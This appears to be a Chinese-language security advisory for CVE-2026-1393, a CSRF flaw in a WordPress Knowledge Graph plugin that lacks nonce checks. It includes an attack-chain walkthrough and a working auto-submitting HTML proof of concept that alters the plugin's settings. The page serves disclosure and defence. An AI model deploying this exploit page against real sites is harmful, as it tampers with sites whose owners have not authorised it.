CVE-2026-1393 CVSS 4.3 中危

CVE-2026-1393: WP插件CSRF漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1393

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Add Google Social Profiles to Knowledge Graph Box

漏洞概述

WordPress插件“Add Google Social Profiles to Knowledge Graph Box”在1.0及以下版本中存在跨站请求伪造（CSRF）漏洞。由于插件设置更新功能缺少nonce验证，未认证攻击者可诱导站点管理员点击恶意链接，伪造请求修改插件配置。

技术细节

该漏洞源于插件在处理设置更新请求时未进行安全令牌验证。WordPress通常使用nonce来验证请求意图，防止CSRF。受影响版本的插件在`gsp-options.php`中处理POST请求时，直接信任用户输入而未校验nonce值。攻击者可构造包含恶意表单的HTML页面，当管理员访问时，浏览器自动携带管理员Cookie发送请求。服务器因缺少验证而执行操作，导致Knowledge Graph设置被篡改。

攻击链分析

STEP 1

1. 构造攻击页面

攻击者创建包含自动提交表单的恶意HTML页面，表单目标指向插件设置接口。

STEP 2

2. 社会工程学诱导

攻击者发送恶意链接给目标网站管理员，诱导其点击访问。

STEP 3

3. 发起伪造请求

管理员在已登录状态下访问链接，浏览器自动携带Cookie向服务器发送设置更新请求。

STEP 4

4. 漏洞触发

服务器端因缺少nonce验证，误认为请求合法，更新了插件的Knowledge Graph设置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-1393 CSRF -->
<!-- Save as exploit.html and host on attacker server -->
<html>
  <body>
    <form action="http://victim-site/wp-admin/options-general.php?page=gsp-settings" method="POST">
      <input type="hidden" name="gsp_knowledge_graph_type" value="Organization" />
      <input type="hidden" name="gsp_name" value="Hacked" />
      <input type="submit" value="Click Me" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

影响范围

Add Google Social Profiles to Knowledge Graph Box <= 1.0

防御指南

临时缓解措施

建议立即检查插件版本，若无法及时升级，应暂时禁用插件。管理员应避免点击来源不明的链接，并对管理后台实施额外的访问控制（如IP白名单）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表